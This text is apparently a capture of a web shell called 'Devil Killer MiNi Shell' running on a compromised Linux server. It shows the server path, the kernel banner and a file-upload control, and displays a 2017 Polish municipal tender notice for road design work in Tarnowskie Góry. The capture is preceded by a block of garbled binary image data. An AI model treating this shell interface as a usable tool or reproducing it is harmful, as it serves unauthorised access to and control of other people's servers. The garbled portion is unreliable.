JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170317/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170317/46198-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bip.mzuim.tarnowskiegory.pl' target='_blank'>http://bip.mzuim.tarnowskiegory.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 46198 - 2017
              z dnia 2017-03-17 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Tarnowskie Góry: Wykonanie dokumentacji projektowej na rozbudowę ulic
 w Tarnowskich Górach.
  CZĘŚĆ 1. Rozbudowa ulicy Towarowej w Tarnowskich Górach
  CZĘŚĆ 2. Rozbudowa ulic: Wiejska i Sielanka w Tarnowskich Górach
  CZĘŚĆ 3. Rozbudowa ulic: Nowej i Torowej w Tarnowskich Górach
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Miejski Zarząd Ulic i Mostów w Tarnowskich Górach, krajowy numer identyfikacyjny
              27300935700000, ul.
              ul. Piastowska 
              8,
              42600  
              Tarnowskie Góry, woj.
              śląskie, państwo
              Polska, tel.
              322 852 203, e-mail
              mzuim@tarnowskiegory.pl, faks
              322 852 203.
              <br />
              Adres strony internetowej (URL): <br />
                Adres profilu nabywcy:

                http://bip.mzuim.tarnowskiegory.pl<br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://bip.mzuim.tarnowskiegory.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />poczta, kurierem, osobiście.<br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Wykonanie dokumentacji projektowej na rozbudowę ulic
 w Tarnowskich Górach.
  CZĘŚĆ 1. Rozbudowa ulicy Towarowej w Tarnowskich Górach
  CZĘŚĆ 2. Rozbudowa ulic: Wiejska i Sielanka w Tarnowskich Górach
  CZĘŚĆ 3. Rozbudowa ulic: Nowej i Torowej w Tarnowskich Górach
<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />3<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia są prace projektowe:
Część 1  Wykonanie dokumentacji projektowej (projekt budowlany i wykonawczy) dla zadania pn.: Rozbudowa ulicy Towarowej  w Tarnowskich Górach.

1.	Zakres prac obejmuje:  
 - przebudowę pasa drogowego w zakresie jak na załączonej mapce poglądowej na ulicy Towarowej (odcinek od ulicy Opolskiej do ulicy Wincentego Pola) w Tarnowskich Górach,
- rozbudowa obejmowała będzie w szczególności: wykonanie chodnika, miejsc postojowych, poprawę geometrii skrzyżowań oraz wzmocnienie istniejącej nawierzchni jezdni.
- zagospodarowanie pasa zieleni (ewentualna wycinka drzew + plan nasadzeń),
- przebudowa i zabezpieczenie sieci infrastruktury podziemnej i naziemnej ( w koniecznych przypadkach i wg wskazań Zamawiającego),
- konieczną przebudowę odwodnienia nawierzchni,
- pełnienie nadzoru autorskiego w czasie trwania realizacji projektu,
- wykonanie koncepcji wariantowych rozwiązań projektowych.

2.	 Dokumentacja projektowa powinna zawierać:
- projekt budowlany dla branż: drogowej oraz innych koniecznych branż,
- projekt wykonawczy dla branż: drogowej oraz innych koniecznych branż,
- wstępne koncepcje wariantowych rozwiązań projektowych  ( w wersji papierowej i elektronicznej),
- mapy do celów projektowych z uzgodnieniami branżowymi  w każdym egzemplarzu projektu,

- wypis i wyrys z rejestru gruntów  z odpisami z ksiąg wieczystych - w każdym egzemplarzu projektu,
- decyzję o uwarunkowaniach środowiskowych (jeśli taka będzie wymagana)  w każdym egzemplarzu projektu,
- decyzję na wycinkę drzew i krzewów (jeśli taka będzie wymagana)  w każdym egzemplarzu projektu,
- uzgodnienia wszelkich kolizji z gestorami właściwych sieci infrastruktury technicznej
  i teletechnicznej - w każdym egzemplarzu projektu,
- zgody na wejście w teren na czas realizacji inwestycji  w każdym egzemplarzu projektu,
- szczegółową specyfikację techniczną wykonania i odbioru robót dla każdej branży  2 egz.,
- informację dotyczącą bezpieczeństwa i ochrony zdrowia  w każdym egzemplarzu projektu,
- przedmiary robót wraz z kosztorysami inwestorskimi  2 egz. (z podziałem na etapy realizacyjne),
- wszelkie konieczne uzgodnienia, decyzje, pozwolenia i opinie  w każdym projekcie,
- wersję elektroniczną dla wszystkich pozycji,
- komplet dokumentów wymaganych do złożenia wniosku o pozwolenie na budowę

3.	Wykonawca w dokumentacji projektowej winien uwzględnić:
- inwentaryzację dendrologiczną istniejącego drzewostanu,
- odwodnienie pasa drogowego,
- rozwiązania kolizji z sieciami  jeśli takowe wystąpią,
- wykonanie badań geotechnicznych podłoża gruntowego,
- wykonanie i zatwierdzenie projektu zmiany organizacji ruchu na czas prowadzenia robót oraz docelowej,
- pełnienie nadzoru autorskiego w czasie trwania realizacji przedmiotowego projektu wg potrzeb Zamawiającego, przygotowanie wyjaśnień, odpowiedzi do opracowanej dokumentacji i przekazywanie ich Zamawiającemu w wyznaczonym przez niego terminie,
- wymagania w zakresie dostępności dla wszystkich użytkowników, w tym dla osób niepełnosprawnych.

4.	Wykonawca jest zobowiązany  do uczestniczenia w organizowanych przez Zamawiającego spotkaniach i naradach, w tym między innymi:
a) w spotkaniach, podczas których prezentowane będą koncepcje proponowanych rozwiązań,
b) w dyskusjach publicznych nad przyjętymi rozwiązaniami,

5. Wykonawca winien przekazać Zamawiającemu przedmiot zamówienia w następujących formach i ilościach:
a) w formie elektronicznej  - w 2 egzemplarzach (tekst w programie Microsoft World, rysunki w JPG, PDF),
b) w formie papierowej  - w 5 egzemplarzach,
c) w formie elektronicznej nieedytowalnej (pliki pdf) oraz edytowalnej (tekst  pliki doc i xls, rysunki  pliki dwg).

Część 2  Wykonanie dokumentacji projektowej (projekt budowlany i wykonawczy) dla zadania pn.: Rozbudowa ulic: Wiejska i Sielanka w Tarnowskich Górach.

1.	Zakres prac obejmuje:  
 - przebudowę pasa drogowego w zakresie jak na załączonej mapce poglądowej na ulicy Wiejskiej i Sielanka w Tarnowskich Górach,
- rozbudowa obejmowała będzie w szczególności: wykonanie chodnika, poprawę geometrii skrzyżowań oraz wzmocnienie istniejącej nawierzchni jezdni.
- zagospodarowanie pasa zieleni (ewentualna wycinka drzew + plan nasadzeń),
- przebudowa i zabezpieczenie sieci infrastruktury podziemnej i naziemnej ( w koniecznych przypadkach i wg wskazań Zamawiającego),
- konieczną przebudowę odwodnienia nawierzchni,
- pełnienie nadzoru autorskiego w czasie trwania realizacji projektu,
- wykonanie koncepcji wariantowych rozwiązań projektowych.

2.	 Dokumentacja projektowa powinna zawierać:
- projekt budowlany dla branż: drogowej oraz innych koniecznych branż,
- projekt wykonawczy dla branż: drogowej oraz innych koniecznych branż,
- wstępne koncepcje wariantowych rozwiązań projektowych  ( w wersji papierowej i elektronicznej),
- mapy do celów projektowych z uzgodnieniami branżowymi  w każdym egzemplarzu projektu,
- wypis i wyrys z rejestru gruntów  z odpisami z ksiąg wieczystych - w każdym egzemplarzu projektu,
- decyzję o uwarunkowaniach środowiskowych (jeśli taka będzie wymagana)  w każdym egzemplarzu projektu,
- decyzję na wycinkę drzew i krzewów (jeśli taka będzie wymagana)  w każdym egzemplarzu projektu,
- uzgodnienia wszelkich kolizji z gestorami właściwych sieci infrastruktury technicznej
  i teletechnicznej - w każdym egzemplarzu projektu,
- zgody na wejście w teren na czas realizacji inwestycji  w każdym egzemplarzu projektu,
- szczegółową specyfikację techniczną wykonania i odbioru robót dla każdej branży  2 egz.,
- informację dotyczącą bezpieczeństwa i ochrony zdrowia  w każdym egzemplarzu projektu,
- przedmiary robót wraz z kosztorysami inwestorskimi  2 egz. (z podziałem na etapy realizacyjne),
- wszelkie konieczne uzgodnienia, decyzje, pozwolenia i opinie  w każdym projekcie,
- wersję elektroniczną dla wszystkich pozycji,
- komplet dokumentów wymaganych do złożenia wniosku o pozwolenie na budowę

3.	Wykonawca w dokumentacji projektowej winien uwzględnić:
- inwentaryzację dendrologiczną istniejącego drzewostanu,
- odwodnienie pasa drogowego,
- rozwiązania kolizji z sieciami  jeśli takowe wystąpią,
- wykonanie badań geotechnicznych podłoża gruntowego,
- wykonanie i zatwierdzenie projektu zmiany organizacji ruchu na czas prowadzenia robót oraz docelowej,
- pełnienie nadzoru autorskiego w czasie trwania realizacji przedmiotowego projektu wg potrzeb Zamawiającego, przygotowanie wyjaśnień, odpowiedzi do opracowanej dokumentacji i przekazywanie ich Zamawiającemu w wyznaczonym przez niego terminie,
- wymagania w zakresie dostępności dla wszystkich użytkowników, w tym dla osób niepełnosprawnych.

4.	Wykonawca jest zobowiązany  do uczestniczenia w organizowanych przez Zamawiającego spotkaniach i naradach, w tym między innymi:
a) w spotkaniach, podczas których prezentowane będą koncepcje proponowanych rozwiązań,
b) w dyskusjach publicznych nad przyjętymi rozwiązaniami,

5. Wykonawca winien przekazać Zamawiającemu przedmiot zamówienia w następujących formach i ilościach:
a) w formie elektronicznej  - w 2 egzemplarzach (tekst w programie Microsoft World, rysunki w JPG, PDF),
b) w formie papierowej  - w 5 egzemplarzach,
c) w formie elektronicznej nieedytowalnej (pliki pdf) oraz edytowalnej (tekst  pliki doc i xls, rysunki  pliki dwg).

Część 3  Wykonanie dokumentacji projektowej (projekt budowlany i wykonawczy) dla zadania pn.: Rozbudowa ulic: Nowej i Torowej w Tarnowskich Górach.

1.	Zakres prac obejmuje:  
 - przebudowę pasa drogowego w zakresie jak na załączonej mapce poglądowej na ulicy Nowej i Torowej w Tarnowskich Górach,
- rozbudowa obejmowała będzie w szczególności: wykonanie chodnika, poprawę geometrii skrzyżowań oraz wzmocnienie istniejącej nawierzchni jezdni.
- zagospodarowanie pasa zieleni (ewentualna wycinka drzew + plan nasadzeń),
- przebudowa i zabezpieczenie sieci infrastruktury podziemnej i naziemnej ( w koniecznych przypadkach i wg wskazań Zamawiającego),
- konieczną przebudowę odwodnienia nawierzchni,
- pełnienie nadzoru autorskiego w czasie trwania realizacji projektu,
- wykonanie koncepcji wariantowych rozwiązań projektowych.

2.	 Dokumentacja projektowa powinna zawierać:
- projekt budowlany dla branż: drogowej oraz innych koniecznych branż,
- projekt wykonawczy dla branż: drogowej oraz innych koniecznych branż,
- wstępne koncepcje wariantowych rozwiązań projektowych  ( w wersji papierowej i elektronicznej),
- mapy do celów projektowych z uzgodnieniami branżowymi  w każdym egzemplarzu projektu,
- wypis i wyrys z rejestru gruntów  z odpisami z ksiąg wieczystych - w każdym egzemplarzu projektu,
- decyzję o uwarunkowaniach środowiskowych (jeśli taka będzie wymagana)  w każdym egzemplarzu projektu,
- decyzję na wycinkę drzew i krzewów (jeśli taka będzie wymagana)  w każdym egzemplarzu projektu,
- uzgodnienia wszelkich kolizji z gestorami właściwych sieci infrastruktury technicznej
  i teletechnicznej - w każdym egzemplarzu projektu,
- zgody na wejście w teren na czas realizacji inwestycji  w każdym egzemplarzu projektu,
- szczegółową specyfikację techniczną wykonania i odbioru robót dla każdej branży  2 egz.,
- informację dotyczącą bezpieczeństwa i ochrony zdrowia  w każdym egzemplarzu projektu,
- przedmiary robót wraz z kosztorysami inwestorskimi  2 egz. (z podziałem na etapy realizacyjne),
- wszelkie konieczne uzgodnienia, decyzje, pozwolenia i opinie  w każdym projekcie,
- wersję elektroniczną dla wszystkich pozycji,
- komplet dokumentów wymaganych do złożenia wniosku o pozwolenie na budowę

3.	Wykonawca w dokumentacji projektowej winien uwzględnić:
- inwentaryzację dendrologiczną istniejącego drzewostanu,
- odwodnienie pasa drogowego,
- rozwiązania kolizji z sieciami  jeśli takowe wystąpią,
- wykonanie badań geotechnicznych podłoża gruntowego,
- wykonanie i zatwierdzenie projektu zmiany organizacji ruchu na czas prowadzenia robót oraz docelowej,
- pełnienie nadzoru autorskiego w czasie trwania realizacji przedmiotowego projektu wg potrzeb Zamawiającego, przygotowanie wyjaśnień, odpowiedzi do opracowanej dokumentacji i przekazywanie ich Zamawiającemu w wyznaczonym przez niego terminie,
- wymagania w zakresie dostępności dla wszystkich użytkowników, w tym dla osób niepełnosprawnych.

4.	Wykonawca jest zobowiązany  do uczestniczenia w organizowanych przez Zamawiającego spotkaniach i naradach, w tym między innymi:
a) w spotkaniach, podczas których prezentowane będą koncepcje proponowanych rozwiązań,
b) w dyskusjach publicznych nad przyjętymi rozwiązaniami,

5. Wykonawca winien przekazać Zamawiającemu przedmiot zamówienia w następujących formach i ilościach:
a) w formie elektronicznej  - w 2 egzemplarzach (tekst w programie Microsoft World, rysunki w JPG, PDF),
b) w formie papierowej  - w 5 egzemplarzach,
c) w formie elektronicznej nieedytowalnej (pliki pdf) oraz edytowalnej (tekst  pliki doc i xls, rysunki  pliki dwg).
<br /><br /><b>II.5) Główny kod CPV: </b>71320000-7<br /><b> Dodatkowe kody CPV:</b>71248000-8<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 08/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca musi wykazać, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wykonał lub wykonuje należycie:
a) dla części 1: co najmniej jeden projekt budowlano-wykonawczy dotyczący budowy, przebudowy lub rozbudowy drogi związany z rozbudową układu drogowego o wartości nie mniejszej niż 35000,00 zł brutto,
b) dla części 2: co najmniej jeden projekt budowlano-wykonawczy dotyczący budowy, przebudowy lub rozbudowy drogi związany z rozbudową układu drogowego o wartości nie mniejszej niż 35000,00 zł brutto.
c) dla części 3: co najmniej jeden projekt budowlano-wykonawczy dotyczący budowy, przebudowy lub rozbudowy drogi związany z rozbudową układu drogowego o wartości nie mniejszej niż 30000,00 zł brutto.

UWAGA! Przy składaniu oferty na więcej niż jedną część zamówienia wystarczającym będzie wykazanie jednej usługi spełniającej wymóg określony powyżej.


3.3.2. Wykonawca musi wykazać dysponowanie (dysponuje lub będzie dysponował) osobami niezbędnymi do wykonania niniejszego zamówienia dla każdej części tj. 

a)	jedną osobą posiadającą uprawnienia do projektowania w specjalności drogowej pełniącą funkcję kierownika zespołu projektowego (osoba odpowiedzialnej za świadczoną usługę);
Ww. osoby winny posiadać uprawnienia budowlane zgodne z zapisami Rozporządzenia Ministra Infrastruktury i Rozwoju z dn. 11.09.2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie na podstawie art. 12, art. 12a i art. 14 ust. 1 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. 2016 r. poz. 290 z późn. zm.) lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz zrzeszone we właściwym samorządzie zawodowym zgodnie z przepisami ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (tekst jednolity Dz. U. 2014 poz. 1946 z  późn. zm.)
lub
spełniającą warunki, o których mowa w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. 2016 r. poz. 290 z późn. zm.), tj. osoba której odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych lub spełniającą wymogi o których mowa w art. 20a ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (świadczenie usług transgranicznych).
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  nie
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
